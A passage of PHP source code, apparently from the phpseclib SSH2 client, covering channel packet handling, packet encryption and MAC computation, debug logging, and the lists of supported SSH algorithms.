(($this->bitmap & self::MASK_CONNECTED) && $this->isAuthenticated()) { if (is_bool($payload)) { return $payload; } switch (ord($payload[0])) { case NET_SSH2_MSG_CHANNEL_REQUEST: if (strlen($payload) == 31) { extract(unpack('cpacket_type/Nchannel/Nlength', $payload)); if (substr($payload, 9, $length) == 'keepalive@openssh.com' && isset($this->server_channels[$channel])) { if (ord(substr($payload, 9 + $length))) { // want reply $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_SUCCESS, $this->server_channels[$channel])); } $payload = $this->get_binary_packet($skip_channel_filter); } } break; case NET_SSH2_MSG_CHANNEL_DATA: case NET_SSH2_MSG_CHANNEL_EXTENDED_DATA: case NET_SSH2_MSG_CHANNEL_CLOSE: case NET_SSH2_MSG_CHANNEL_EOF: if (!$skip_channel_filter && !empty($this->server_channels)) { $this->binary_packet_buffer = $payload; $this->get_channel_packet(true); $payload = $this->get_binary_packet(); } break; case NET_SSH2_MSG_GLOBAL_REQUEST: // see http://tools.ietf.org/html/rfc4254#section-4 Strings::shift($payload, 1); list($request_name) = Strings::unpackSSH2('s', $payload); $this->errors[] = "SSH_MSG_GLOBAL_REQUEST: $request_name"; try { $this->send_binary_packet(pack('C', NET_SSH2_MSG_REQUEST_FAILURE)); } catch (\RuntimeException $e) { return $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); } $payload = $this->get_binary_packet($skip_channel_filter); break; case NET_SSH2_MSG_CHANNEL_OPEN: // see http://tools.ietf.org/html/rfc4254#section-5.1 Strings::shift($payload, 1); list($data, $server_channel) = Strings::unpackSSH2('sN', $payload); switch ($data) { case 'auth-agent': case 'auth-agent@openssh.com': if (isset($this->agent)) { $new_channel = self::CHANNEL_AGENT_FORWARD; list( $remote_window_size, $remote_maximum_packet_size ) = Strings::unpackSSH2('NN', $payload); $this->packet_size_client_to_server[$new_channel] = $remote_window_size; $this->window_size_server_to_client[$new_channel] = $remote_maximum_packet_size; $this->window_size_client_to_server[$new_channel] = $this->window_size; $packet_size = 0x4000; $packet = pack( 'CN4', NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION, $server_channel, $new_channel, $packet_size, $packet_size ); $this->server_channels[$new_channel] = $server_channel; $this->channel_status[$new_channel] = NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION; $this->send_binary_packet($packet); } break; default: $packet = Strings::packSSH2( 'CN2ss', NET_SSH2_MSG_CHANNEL_OPEN_FAILURE, $server_channel, NET_SSH2_OPEN_ADMINISTRATIVELY_PROHIBITED, '', // description '' // language tag ); try { $this->send_binary_packet($packet); } catch (\RuntimeException $e) { return $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); } } $payload = $this->get_binary_packet($skip_channel_filter); break; case NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST: Strings::shift($payload, 1); list($channel, $window_size) = Strings::unpackSSH2('NN', $payload); $this->window_size_client_to_server[$channel] += $window_size; $payload = ($this->bitmap & self::MASK_WINDOW_ADJUST) ? true : $this->get_binary_packet($skip_channel_filter); } } return $payload; } /** * Enable Quiet Mode * * Suppress stderr from output * */ public function enableQuietMode() { $this->quiet_mode = true; } /** * Disable Quiet Mode * * Show stderr in output * */ public function disableQuietMode() { $this->quiet_mode = false; } /** * Returns whether Quiet Mode is enabled or not * * @see self::enableQuietMode() * @see self::disableQuietMode() * @return bool */ public function isQuietModeEnabled() { return $this->quiet_mode; } /** * Enable request-pty when using exec() * */ public function enablePTY() { $this->request_pty = true; } /** * Disable request-pty when using exec() * */ public function disablePTY() { if ($this->isPTYOpen()) { $this->close_channel(self::CHANNEL_EXEC); } $this->request_pty = false; } /** * Returns whether request-pty is enabled or not * * @see self::enablePTY() * @see self::disablePTY() * @return bool */ public function isPTYEnabled() { return $this->request_pty; } /** * Gets channel data * * Returns the data as a string. bool(true) is returned if: * * - the server closes the channel * - if the connection times out * - if the channel status is CHANNEL_OPEN and the response was CHANNEL_OPEN_CONFIRMATION * - if the channel status is CHANNEL_REQUEST and the response was CHANNEL_SUCCESS * - if the channel status is CHANNEL_CLOSE and the response was CHANNEL_CLOSE * * bool(false) is returned if: * * - if the channel status is CHANNEL_REQUEST and the response was CHANNEL_FAILURE * * @param int $client_channel * @param bool $skip_extended * @return mixed * @throws \RuntimeException on connection error */ protected function get_channel_packet($client_channel, $skip_extended = false) { if (!empty($this->channel_buffers[$client_channel])) { switch ($this->channel_status[$client_channel]) { case NET_SSH2_MSG_CHANNEL_REQUEST: foreach ($this->channel_buffers[$client_channel] as $i => $packet) { switch (ord($packet[0])) { case NET_SSH2_MSG_CHANNEL_SUCCESS: case NET_SSH2_MSG_CHANNEL_FAILURE: unset($this->channel_buffers[$client_channel][$i]); return substr($packet, 1); } } break; default: return substr(array_shift($this->channel_buffers[$client_channel]), 1); } } while (true) { if ($this->binary_packet_buffer !== false) { $response = $this->binary_packet_buffer; $this->binary_packet_buffer = false; } else { $response = $this->get_binary_packet(true); if ($response === true && $this->is_timeout) { if ($client_channel == self::CHANNEL_EXEC && !$this->request_pty) { $this->close_channel($client_channel); } return true; } if ($response === false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new ConnectionClosedException('Connection closed by server'); } } if ($client_channel == -1 && $response === true) { return true; } list($type, $channel) = Strings::unpackSSH2('CN', $response); // will not be setup yet on incoming channel open request if (isset($channel) && isset($this->channel_status[$channel]) && isset($this->window_size_server_to_client[$channel])) { $this->window_size_server_to_client[$channel] -= strlen($response); // resize the window, if appropriate if ($this->window_size_server_to_client[$channel] < 0) { // PuTTY does something more analogous to the following: //if ($this->window_size_server_to_client[$channel] < 0x3FFFFFFF) { $packet = pack('CNN', NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST, $this->server_channels[$channel], $this->window_resize); $this->send_binary_packet($packet); $this->window_size_server_to_client[$channel] += $this->window_resize; } switch ($type) { case NET_SSH2_MSG_CHANNEL_EXTENDED_DATA: /* if ($client_channel == self::CHANNEL_EXEC) { $this->send_channel_packet($client_channel, chr(0)); } */ // currently, there's only one possible value for $data_type_code: NET_SSH2_EXTENDED_DATA_STDERR list($data_type_code, $data) = Strings::unpackSSH2('Ns', $response); $this->stdErrorLog .= $data; if ($skip_extended || $this->quiet_mode) { continue 2; } if ($client_channel == $channel && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA) { return $data; } $this->channel_buffers[$channel][] = chr($type) . $data; continue 2; case NET_SSH2_MSG_CHANNEL_REQUEST: if ($this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_CLOSE) { continue 2; } list($value) = Strings::unpackSSH2('s', $response); switch ($value) { case 'exit-signal': list( , // FALSE $signal_name, , // core dumped $error_message ) = Strings::unpackSSH2('bsbs', $response); $this->errors[] = "SSH_MSG_CHANNEL_REQUEST (exit-signal): $signal_name"; if (strlen($error_message)) { $this->errors[count($this->errors) - 1] .= "\r\n$error_message"; } $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_EOF, $this->server_channels[$client_channel])); $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$channel])); $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_EOF; continue 3; case 'exit-status': list(, $this->exit_status) = Strings::unpackSSH2('CN', $response); // "The client MAY ignore these messages." // -- http://tools.ietf.org/html/rfc4254#section-6.10 continue 3; default: // "Some systems may not implement signals, in which case they SHOULD ignore this message." // -- http://tools.ietf.org/html/rfc4254#section-6.9 continue 3; } } switch ($this->channel_status[$channel]) { case NET_SSH2_MSG_CHANNEL_OPEN: switch ($type) { case NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION: list( $this->server_channels[$channel], $window_size, $this->packet_size_client_to_server[$channel] ) = Strings::unpackSSH2('NNN', $response); if ($window_size < 0) { $window_size &= 0x7FFFFFFF; $window_size += 0x80000000; } $this->window_size_client_to_server[$channel] = $window_size; $result = $client_channel == $channel ? true : $this->get_channel_packet($client_channel, $skip_extended); $this->on_channel_open(); return $result; case NET_SSH2_MSG_CHANNEL_OPEN_FAILURE: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to open channel'); default: if ($client_channel == $channel) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unexpected response to open request'); } return $this->get_channel_packet($client_channel, $skip_extended); } break; case NET_SSH2_MSG_CHANNEL_REQUEST: switch ($type) { case NET_SSH2_MSG_CHANNEL_SUCCESS: return true; case NET_SSH2_MSG_CHANNEL_FAILURE: return false; case NET_SSH2_MSG_CHANNEL_DATA: list($data) = Strings::unpackSSH2('s', $response); $this->channel_buffers[$channel][] = chr($type) . $data; return $this->get_channel_packet($client_channel, $skip_extended); default: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to fulfill channel request'); } case NET_SSH2_MSG_CHANNEL_CLOSE: if ($client_channel == $channel && $type == NET_SSH2_MSG_CHANNEL_CLOSE) { return true; } return $this->get_channel_packet($client_channel, $skip_extended); } } // ie. $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA switch ($type) { case NET_SSH2_MSG_CHANNEL_DATA: /* if ($channel == self::CHANNEL_EXEC) { // SCP requires null packets, such as this, be sent. further, in the case of the ssh.com SSH server // this actually seems to make things twice as fast. more to the point, the message right after // SSH_MSG_CHANNEL_DATA (usually SSH_MSG_IGNORE) won't block for as long as it would have otherwise. // in OpenSSH it slows things down but only by a couple thousandths of a second. $this->send_channel_packet($channel, chr(0)); } */ list($data) = Strings::unpackSSH2('s', $response); if ($channel == self::CHANNEL_AGENT_FORWARD) { $agent_response = $this->agent->forwardData($data); if (!is_bool($agent_response)) { $this->send_channel_packet($channel, $agent_response); } break; } if ($client_channel == $channel) { return $data; } $this->channel_buffers[$channel][] = chr($type) . $data; break; case NET_SSH2_MSG_CHANNEL_CLOSE: $this->curTimeout = 5; $this->close_channel_bitmap($channel); if ($this->channel_status[$channel] != NET_SSH2_MSG_CHANNEL_EOF) { $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$channel])); } $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_CLOSE; $this->channelCount--; if ($client_channel == $channel) { return true; } // fall-through case NET_SSH2_MSG_CHANNEL_EOF: break; default: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException("Error reading channel data ($type)"); } } } /** * Sends Binary Packets * * See '6. Binary Packet Protocol' of rfc4253 for more info. * * @param string $data * @param string $logged * @see self::_get_binary_packet() * @return void */ protected function send_binary_packet($data, $logged = null) { if (!is_resource($this->fsock) || feof($this->fsock)) { $this->bitmap = 0; throw new ConnectionClosedException('Connection closed prematurely'); } if (!isset($logged)) { $logged = $data; } switch ($this->compress) { case self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH: if (!$this->isAuthenticated()) { break; } // fall-through case self::NET_SSH2_COMPRESSION_ZLIB: if (!$this->regenerate_compression_context) { $header = ''; } else { $this->regenerate_compression_context = false; $this->compress_context = deflate_init(ZLIB_ENCODING_RAW, ['window' => 15]); $header = "\x78\x9C"; } if ($this->compress_context) { $data = $header . deflate_add($this->compress_context, $data, ZLIB_PARTIAL_FLUSH); } } // 4 (packet length) + 1 (padding length) + 4 (minimal padding amount) == 9 $packet_length = strlen($data) + 9; if ($this->encrypt && $this->encrypt->usesNonce()) { $packet_length -= 4; } // round up to the nearest $this->encrypt_block_size $packet_length += (($this->encrypt_block_size - 1) * $packet_length) % $this->encrypt_block_size; // subtracting strlen($data) is obvious - subtracting 5 is necessary because of packet_length and padding_length $padding_length = $packet_length - strlen($data) - 5; switch (true) { case $this->encrypt && $this->encrypt->usesNonce(): case $this->hmac_create instanceof Hash && $this->hmac_create_etm: $padding_length += 4; $packet_length += 4; } $padding = Random::string($padding_length); // we subtract 4 from packet_length because the packet_length field isn't supposed to include itself $packet = pack('NCa*', $packet_length - 4, $padding_length, $data . $padding); $hmac = ''; if ($this->hmac_create instanceof Hash && !$this->hmac_create_etm) { if (($this->hmac_create->getHash() & "\xFF\xFF\xFF\xFF") == 'umac') { $this->hmac_create->setNonce("\0\0\0\0" . pack('N', $this->send_seq_no)); $hmac = $this->hmac_create->hash($packet); } else { $hmac = $this->hmac_create->hash(pack('Na*', $this->send_seq_no, $packet)); } } if ($this->encrypt) { switch ($this->encryptName) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $this->encrypt->setNonce( $this->encryptFixedPart . $this->encryptInvocationCounter ); Strings::increment_str($this->encryptInvocationCounter); $this->encrypt->setAAD($temp = ($packet & "\xFF\xFF\xFF\xFF")); $packet = $temp . $this->encrypt->encrypt(substr($packet, 4)); break; case 'chacha20-poly1305@openssh.com': // This should be impossible, but we are checking anyway to narrow the type for Psalm. if (!($this->encrypt instanceof ChaCha20)) { throw new \LogicException('$this->encrypt is not a ' . ChaCha20::class); } $nonce = pack('N2', 0, $this->send_seq_no); $this->encrypt->setNonce($nonce); $this->lengthEncrypt->setNonce($nonce); $length = $this->lengthEncrypt->encrypt($packet & "\xFF\xFF\xFF\xFF"); $this->encrypt->setCounter(0); // this is the same approach that's implemented in Salsa20::createPoly1305Key() // but we don't want to use the same AEAD construction that RFC8439 describes // for ChaCha20-Poly1305 so we won't rely on it (see Salsa20::poly1305()) $this->encrypt->setPoly1305Key( $this->encrypt->encrypt(str_repeat("\0", 32)) ); $this->encrypt->setAAD($length); $this->encrypt->setCounter(1); $packet = $length . $this->encrypt->encrypt(substr($packet, 4)); break; default: $packet = $this->hmac_create instanceof Hash && $this->hmac_create_etm ? ($packet & "\xFF\xFF\xFF\xFF") . $this->encrypt->encrypt(substr($packet, 4)) : $this->encrypt->encrypt($packet); } } if ($this->hmac_create instanceof Hash && $this->hmac_create_etm) { if (($this->hmac_create->getHash() & "\xFF\xFF\xFF\xFF") == 'umac') { $this->hmac_create->setNonce("\0\0\0\0" . pack('N', $this->send_seq_no)); $hmac = $this->hmac_create->hash($packet); } else { $hmac = $this->hmac_create->hash(pack('Na*', $this->send_seq_no, $packet)); } } $this->send_seq_no++; $packet .= $this->encrypt && $this->encrypt->usesNonce() ? $this->encrypt->getTag() : $hmac; $start = microtime(true); $sent = @fputs($this->fsock, $packet); $stop = microtime(true); if (defined('NET_SSH2_LOGGING')) { $current = microtime(true); $message_number = isset(self::$message_numbers[ord($logged[0])]) ? self::$message_numbers[ord($logged[0])] : 'UNKNOWN (' . ord($logged[0]) . ')'; $message_number = '-> ' . $message_number . ' (since last: ' . round($current - $this->last_packet, 4) . ', network: ' . round($stop - $start, 4) . 's)'; $this->append_log($message_number, $logged); $this->last_packet = $current; } if (strlen($packet) != $sent) { $this->bitmap = 0; $message = $sent === false ? 'Unable to write ' . strlen($packet) . ' bytes' : "Only $sent of " . strlen($packet) . " bytes were sent"; throw new \RuntimeException($message); } } /** * Logs data packets * * Makes sure that only the last 1MB worth of packets will be logged * * @param string $message_number * @param string $message */ private function append_log($message_number, $message) { $this->append_log_helper( NET_SSH2_LOGGING, $message_number, $message, $this->message_number_log, $this->message_log, $this->log_size, $this->realtime_log_file, $this->realtime_log_wrap, $this->realtime_log_size ); } /** * Logs data packet helper * * @param int $constant * @param string $message_number * @param string $message * @param array &$message_number_log * @param array &$message_log * @param int &$log_size * @param resource &$realtime_log_file * @param bool &$realtime_log_wrap * @param int &$realtime_log_size */ protected function append_log_helper($constant, $message_number, $message, array &$message_number_log, array &$message_log, &$log_size, &$realtime_log_file, &$realtime_log_wrap, &$realtime_log_size) { // remove the byte identifying the message type from all but the first two messages (ie. the identification strings) if (strlen($message_number) > 2) { Strings::shift($message); } switch ($constant) { // useful for benchmarks case self::LOG_SIMPLE: $message_number_log[] = $message_number; break; case self::LOG_SIMPLE_REALTIME: echo $message_number; echo PHP_SAPI == 'cli' ? "\r\n" : '
'; @flush(); @ob_flush(); break; // the most useful log for SSH2 case self::LOG_COMPLEX: $message_number_log[] = $message_number; $log_size += strlen($message); $message_log[] = $message; while ($log_size > self::LOG_MAX_SIZE) { $log_size -= strlen(array_shift($message_log)); array_shift($message_number_log); } break; // dump the output out realtime; packets may be interspersed with non packets, // passwords won't be filtered out and select other packets may not be correctly // identified case self::LOG_REALTIME: switch (PHP_SAPI) { case 'cli': $start = $stop = "\r\n"; break; default: $start = '
                        $stop = '
'; } echo $start . $this->format_log([$message], [$message_number]) . $stop; @flush(); @ob_flush(); break; // basically the same thing as self::LOG_REALTIME with the caveat that NET_SSH2_LOG_REALTIME_FILENAME // needs to be defined and that the resultant log file will be capped out at self::LOG_MAX_SIZE. // the earliest part of the log file is denoted by the first <<< START >>> and is not going to necessarily // at the beginning of the file case self::LOG_REALTIME_FILE: if (!isset($realtime_log_file)) { // PHP doesn't seem to like using constants in fopen() $filename = NET_SSH2_LOG_REALTIME_FILENAME; $fp = fopen($filename, 'w'); $realtime_log_file = $fp; } if (!is_resource($realtime_log_file)) { break; } $entry = $this->format_log([$message], [$message_number]); if ($realtime_log_wrap) { $temp = "<<< START >>>\r\n"; $entry .= $temp; fseek($realtime_log_file, ftell($realtime_log_file) - strlen($temp)); } $realtime_log_size += strlen($entry); if ($realtime_log_size > self::LOG_MAX_SIZE) { fseek($realtime_log_file, 0); $realtime_log_size = strlen($entry); $realtime_log_wrap = true; } fputs($realtime_log_file, $entry); } } /** * Sends channel data * * Spans multiple SSH_MSG_CHANNEL_DATAs if appropriate * * @param int $client_channel * @param string $data * @return void */ protected function send_channel_packet($client_channel, $data) { while (strlen($data)) { if (!$this->window_size_client_to_server[$client_channel]) { $this->bitmap ^= self::MASK_WINDOW_ADJUST; // using an invalid channel will let the buffers be built up for the valid channels $this->get_channel_packet(-1); $this->bitmap ^= self::MASK_WINDOW_ADJUST; } /* The maximum amount of data allowed is determined by the maximum packet size for the channel, and the current window size, whichever is smaller. -- http://tools.ietf.org/html/rfc4254#section-5.2 */ $max_size = min( $this->packet_size_client_to_server[$client_channel], $this->window_size_client_to_server[$client_channel] ); $temp = Strings::shift($data, $max_size); $packet = Strings::packSSH2( 'CNs', NET_SSH2_MSG_CHANNEL_DATA, $this->server_channels[$client_channel], $temp ); $this->window_size_client_to_server[$client_channel] -= strlen($temp); $this->send_binary_packet($packet); } } /** * Closes and flushes a channel * * \phpseclib3\Net\SSH2 doesn't properly close most channels. For exec() channels are normally closed by the server * and for SFTP channels are presumably closed when the client disconnects. This functions is intended * for SCP more than anything. * * @param int $client_channel * @param bool $want_reply * @return void */ private function close_channel($client_channel, $want_reply = false) { // see http://tools.ietf.org/html/rfc4254#section-5.3 $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_EOF, $this->server_channels[$client_channel])); if (!$want_reply) { $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$client_channel])); } $this->channel_status[$client_channel] = NET_SSH2_MSG_CHANNEL_CLOSE; $this->channelCount--; $this->curTimeout = 5; while (!is_bool($this->get_channel_packet($client_channel))) { } if ($want_reply) { $this->send_binary_packet(pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$client_channel])); } $this->close_channel_bitmap($client_channel); } /** * Maintains execution state bitmap in response to channel closure * * @param int $client_channel The channel number to maintain closure status of * @return void */ private function close_channel_bitmap($client_channel) { switch ($client_channel) { case self::CHANNEL_SHELL: // Shell status has been maintained in the bitmap for backwards // compatibility sake, but can be removed going forward if ($this->bitmap & self::MASK_SHELL) { $this->bitmap &= ~self::MASK_SHELL; } break; } } /** * Disconnect * * @param int $reason * @return false */ protected function disconnect_helper($reason) { if ($this->bitmap & self::MASK_CONNECTED) { $data = Strings::packSSH2('CNss', NET_SSH2_MSG_DISCONNECT, $reason, '', ''); try { $this->send_binary_packet($data); } catch (\Exception $e) { } } $this->bitmap = 0; if (is_resource($this->fsock) && get_resource_type($this->fsock) === 'stream') { fclose($this->fsock); } return false; } /** * Define Array * * Takes any number of arrays whose indices are integers and whose values are strings and defines a bunch of * named constants from it, using the value as the name of the constant and the index as the value of the constant. * If any of the constants that would be defined already exists, none of the constants will be defined. * * @param mixed[] ...$args * @access protected */ protected static function define_array(...$args) { foreach ($args as $arg) { foreach ($arg as $key => $value) { if (!defined($value)) { define($value, $key); } else { break 2; } } } } /** * Returns a log of the packets that have been sent and received. * * Returns a string if NET_SSH2_LOGGING == self::LOG_COMPLEX, an array if NET_SSH2_LOGGING == self::LOG_SIMPLE and false if !defined('NET_SSH2_LOGGING') * * @return array|false|string */ public function getLog() { if (!defined('NET_SSH2_LOGGING')) { return false; } switch (NET_SSH2_LOGGING) { case self::LOG_SIMPLE: return $this->message_number_log; case self::LOG_COMPLEX: $log = $this->format_log($this->message_log, $this->message_number_log); return PHP_SAPI == 'cli' ? $log : '
' . $log . '
'; default: return false; } } /** * Formats a log for printing * * @param array $message_log * @param array $message_number_log * @return string */ protected function format_log(array $message_log, array $message_number_log) { $output = ''; for ($i = 0; $i < count($message_log); $i++) { $output .= $message_number_log[$i] . "\r\n"; $current_log = $message_log[$i]; $j = 0; do { if (strlen($current_log)) { $output .= str_pad(dechex($j), 7, '0', STR_PAD_LEFT) . '0 '; } $fragment = Strings::shift($current_log, $this->log_short_width); $hex = substr(preg_replace_callback('#.#s', function ($matches) { return $this->log_boundary . str_pad(dechex(ord($matches[0])), 2, '0', STR_PAD_LEFT); }, $fragment), strlen($this->log_boundary)); // replace non ASCII printable characters with dots // http://en.wikipedia.org/wiki/ASCII#ASCII_printable_characters // also replace < with a . since < messes up the output on web browsers $raw = preg_replace('#[^\x20-\x7E]|<#', '.', $fragment); $output .= str_pad($hex, $this->log_long_width - $this->log_short_width, ' ') . $raw . "\r\n"; $j++; } while (strlen($current_log)); $output .= "\r\n"; } return $output; } /** * Helper function for agent->on_channel_open() * * Used when channels are created to inform agent * of said channel opening. Must be called after * channel open confirmation received * */ private function on_channel_open() { if (isset($this->agent)) { $this->agent->registerChannelOpen($this); } } /** * Returns the first value of the intersection of two arrays or false if * the intersection is empty. The order is defined by the first parameter. * * @param array $array1 * @param array $array2 * @return mixed False if intersection is empty, else intersected value. */ private static function array_intersect_first(array $array1, array $array2) { foreach ($array1 as $value) { if (in_array($value, $array2)) { return $value; } } return false; } /** * Returns all errors * * @return string[] */ public function getErrors() { return $this->errors; } /** * Returns the last error * * @return string */ public function getLastError() { $count = count($this->errors); if ($count > 0) { return $this->errors[$count - 1]; } } /** * Return the server identification. * * @return string|false */ public function getServerIdentification() { $this->connect(); return $this->server_identifier; } /** * Returns a list of algorithms the server supports * * @return array */ public function getServerAlgorithms() { $this->connect(); return [ 'kex' => $this->kex_algorithms, 'hostkey' => $this->server_host_key_algorithms, 'client_to_server' => [ 'crypt' => $this->encryption_algorithms_client_to_server, 'mac' => $this->mac_algorithms_client_to_server, 'comp' => $this->compression_algorithms_client_to_server, 'lang' => $this->languages_client_to_server ], 'server_to_client' => [ 'crypt' => $this->encryption_algorithms_server_to_client, 'mac' => $this->mac_algorithms_server_to_client, 'comp' => $this->compression_algorithms_server_to_client, 'lang' => $this->languages_server_to_client ] ]; } /** * Returns a list of KEX algorithms that phpseclib supports * * @return array */ public static function getSupportedKEXAlgorithms() { $kex_algorithms = [ // Elliptic Curve Diffie-Hellman Key Agreement (ECDH) using // Curve25519. See doc/curve25519-sha256@libssh.org.txt in the // libssh repository for more information. 'curve25519-sha256', 'curve25519-sha256@libssh.org', 'ecdh-sha2-nistp256', // RFC 5656 'ecdh-sha2-nistp384', // RFC 5656 'ecdh-sha2-nistp521', // RFC 5656 'diffie-hellman-group-exchange-sha256',// RFC 4419 'diffie-hellman-group-exchange-sha1', // RFC 4419 // Diffie-Hellman Key Agreement (DH) using integer modulo prime // groups. 'diffie-hellman-group14-sha256', 'diffie-hellman-group14-sha1', // REQUIRED 'diffie-hellman-group15-sha512', 'diffie-hellman-group16-sha512', 'diffie-hellman-group17-sha512', 'diffie-hellman-group18-sha512', 'diffie-hellman-group1-sha1', // REQUIRED ]; return $kex_algorithms; } /** * Returns a list of host key algorithms that phpseclib supports * * @return array */ public static function getSupportedHostKeyAlgorithms() { return [ 'ssh-ed25519', // https://tools.ietf.org/html/draft-ietf-curdle-ssh-ed25519-02 'ecdsa-sha2-nistp256', // RFC 5656 'ecdsa-sha2-nistp384', // RFC 5656 'ecdsa-sha2-nistp521', // RFC 5656 'rsa-sha2-256', // RFC 8332 'rsa-sha2-512', // RFC 8332 'ssh-rsa', // RECOMMENDED sign Raw RSA Key 'ssh-dss' // REQUIRED sign Raw DSS Key ]; } /** * Returns a list of symmetric key algorithms that phpseclib supports * * @return array */ public static function getSupportedEncryptionAlgorithms() { $algos = [ // from : 'aes128-gcm@openssh.com', 'aes256-gcm@openssh.com', // from : 'arcfour256', 'arcfour128', //'arcfour', // OPTIONAL the ARCFOUR stream cipher with a 128-bit key // CTR modes from : 'aes128-ctr', // RECOMMENDED AES (Rijndael) in SDCTR mode, with 128-bit key 'aes192-ctr', // RECOMMENDED AES with 192-bit key 'aes256-ctr', // RECOMMENDED AES with 256-bit key // from : // one of the big benefits of chacha20-poly1305 is speed. the problem is... // libsodium doesn't generate the poly1305 keys in the way ssh does and openssl's PHP bindings don't even // seem to support poly1305 currently. so even if libsodium or openssl are being used for the chacha20 // part, pure-PHP has to be used for the poly1305 part and that's gonna cause a big slow down. // speed-wise it winds up being faster to use AES (when openssl or mcrypt are available) and some HMAC // (which is always gonna be super fast to compute thanks to the hash extension, which // "is bundled and compiled into PHP by default") 'chacha20-poly1305@openssh.com', 'twofish128-ctr', // OPTIONAL Twofish in SDCTR mode, with 128-bit key 'twofish192-ctr', // OPTIONAL Twofish with 192-bit key 'twofish256-ctr', // OPTIONAL Twofish with 256-bit key 'aes128-cbc', // RECOMMENDED AES with a 128-bit key 'aes192-cbc', // OPTIONAL AES with a 192-bit key 'aes256-cbc', // OPTIONAL AES in CBC mode, with a 256-bit key 'twofish128-cbc', // OPTIONAL Twofish with a 128-bit key 'twofish192-cbc', // OPTIONAL Twofish with a 192-bit key 'twofish256-cbc', 'twofish-cbc', // OPTIONAL alias for "twofish256-cbc" // (this is being retained for historical reasons) 'blowfish-ctr', // OPTIONAL Blowfish in SDCTR mode 'blowfish-cbc', // OPTIONAL Blowfish in CBC mode '3des-ctr', // RECOMMENDED Three-key 3DES in SDCTR mode '3des-cbc', // REQUIRED three-key 3DES in CBC mode //'none' // OPTIONAL no encryption; NOT RECOMMENDED ]; if (self::$crypto_engine) { $engines = [self::$crypto_engine]; } else { $engines = [ 'libsodium', 'OpenSSL (GCM)', 'OpenSSL', 'mcrypt', 'Eval', 'PHP' ]; } $ciphers = []; foreach ($engines as $engine) { foreach ($algos as $algo) { $obj = self::encryption_algorithm_to_crypt_instance($algo); if ($obj instanceof Rijndael) { $obj->setKeyLength(preg_replace('#[^\d]#', '', $algo)); } switch ($algo) { case 'chacha20-poly1305@openssh.com': case 'arcfour128': case 'arcfour256': if ($engine != 'Eval') { continue 2; } break; case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': if ($engine == 'OpenSSL') { continue 2; } $obj->setNonce('dummydummydu'); } if ($obj->isValidEngine($engine)) { $algos = array_diff($algos, [$algo]); $ciphers[] = $algo; } } } return $ciphers; } /** * Returns a list of MAC algorithms that phpseclib supports * * @return array */ public static function getSupportedMACAlgorithms() { return [ 'hmac-sha2-256-etm@openssh.com', 'hmac-sha2-512-etm@openssh.com', 'umac-64-etm@openssh.com', 'umac-128-etm@openssh.com', 'hmac-sha1-etm@openssh.com', // from : 'hmac-sha2-256',// RECOMMENDED HMAC-SHA256 (digest length = key length = 32) 'hmac-sha2-512',// OPTIONAL HMAC-SHA512 (digest length = key length = 64) // from : 'umac-64@openssh.com', 'umac-128@openssh.com', 'hmac-sha1-96', // RECOMMENDED first 96 bits of HMAC-SHA1 (digest length = 12, key length = 20) 'hmac-sha1', // REQUIRED HMAC-SHA1 (digest length = key length = 20) 'hmac-md5-96', // OPTIONAL first 96 bits of HMAC-MD5 (digest length = 12, key length = 16) 'hmac-md5', // OPTIONAL HMAC-MD5 (digest length = key length = 16) //'none' // OPTIONAL no MAC; NOT RECOMMENDED ]; } /** * Returns a list of compression algorithms that phpseclib supports * * @return array */ public static function getSupportedCompressionAlgorithms() { $algos = ['none']; // REQUIRED no compression if (function_exists('deflate_init')) { $algos[] = 'zlib@openssh.com'; // https://datatracker.ietf.org/doc/html/draft-miller-secsh-compression-delayed $algos[] = 'zlib'; } return $algos; } /** * Return list of negotiated algorithms * * Uses the same format as https://www.php.net/ssh2-methods-negotiated * * @return array */ public function getAlgorithmsNegotiated() { $this->connect(); $compression_map = [ self::NET_SSH2_COMPRESSION_NONE => 'none', self::NET_SSH2_COMPRESSION_ZLIB => 'zlib', self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH => 'zlib@openssh.com' ]; return [ 'kex' => $this->kex_algorithm, 'hostkey' => $this->signature_format, 'client_to_server' => [ 'crypt' => $this->encryptName, 'mac' => $this->hmac_create_name, 'comp' => $compression_map[$this->compress], ], 'server_to_client' => [ 'crypt' => $this->decryptName, 'mac' => $this->hmac_check_name, 'comp' => $compression_map[$this->decompress], ] ]; } /** * Force multiple channels (even if phpseclib has decided to disable them) */ public function forceMultipleChannels() { $this->errorOnMultipleChannels = false; } /** * Allows you to set the terminal * * @param string $term */ public function setTerminal($term) { $this->term = $term; } /** * Accepts an associative array with up to four parameters as described at * * * @param array $methods */ public function setPreferredAlgorithms(array $methods) { $preferred = $methods; if (isset($preferred['kex'])) { $preferred['kex'] = array_intersect( $preferred['kex'], static::getSupportedKEXAlgorithms() ); } if 